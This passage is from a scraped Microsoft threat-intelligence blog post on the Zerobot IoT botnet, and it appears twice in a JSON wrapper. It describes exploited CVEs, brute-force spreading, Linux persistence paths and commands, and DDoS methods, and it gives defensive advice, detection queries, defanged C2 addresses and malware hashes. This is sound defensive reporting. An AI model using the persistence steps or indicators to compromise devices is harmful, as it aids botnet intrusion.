allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender 
for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), 
SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * 
eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. 
Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continues to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware-as-a-service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. 
We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. 
Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh_ that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many different central processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe_). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. 
See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_, then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop_.\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. 
\nHTTP_HANDLE| Sends HTTP GET requests using the Go standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ASCII). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are network decoys used to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. 
The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscore the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least-privilege access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged solutions, enable Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on your or your organization\u2019s devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender 
for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), 
SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * 
eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir 